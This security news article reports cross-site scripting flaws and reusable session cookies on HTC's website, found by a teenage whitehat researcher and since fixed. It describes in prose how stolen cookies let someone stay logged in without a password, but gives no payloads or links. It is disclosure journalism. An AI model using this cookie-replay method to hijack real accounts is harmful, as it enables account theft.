Thamatam Deepak (Mr.47™) reported a Cross site scripting (XSS) Vulnerability and cookie handling in HTC website, that allow an attacker to HTC website hijack accounts. Mr. Deepak is a 16 years old whitehat hacker, listed in Apple Hall of Fame with 'The Hacker News' researcher Mohit Kumar this month.
Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. The malicious script can access any cookies, session tokens, or other sensitive information retained by your browser. This vulnerability may be used by attackers to bypass access controls such as the same origin policy.
Cross site scripting is very common web application vulnerability, Yesterday our security researcher, Christy Philip Mathew reported about multiple xss in official latest versions of cPanel and WHM.
As reported by Whitehat hacker Deepak, there are multiple xss in HTC website, that allow an attacker to inject malicious scripts. Moreover, another vulnerability - Cookies Handling make it more easy for an attack to hijack accounts of HTC users.
Some sample vulnerable links are as show below:
At time of reporting, these flaws are fixed by vendor after reported by hacker and was working on Google Chrome perfectly. More interesting fact is that , one XSS is also available on HTC PRODUCT SECURITY page, where HTC said "At HTC, we recognize how important it is to protect your privacy and security. We understand that secure products are essential in maintaining the trust you place in us to provide products and services to you."
For proof of concept, we created an account on HTC website, Import the cookies in a text file and logout from website. On other system, I just import the cookies from same text file. Then, I open the HTC website and found that I am again logged-in without password authentication. i.e One can reuse the same cookies again and again for authentication until its expiry date and Cross site scripting vulnerability allow attack to steal cookies remotely by use of some social engineering tricks.
Similar cookie handling vulnerability was reported by 'The Hacker News' Security researchers Christy Philip Mathew and Mohit Kumar last month in Hotmail and Outlook with proof of concepts.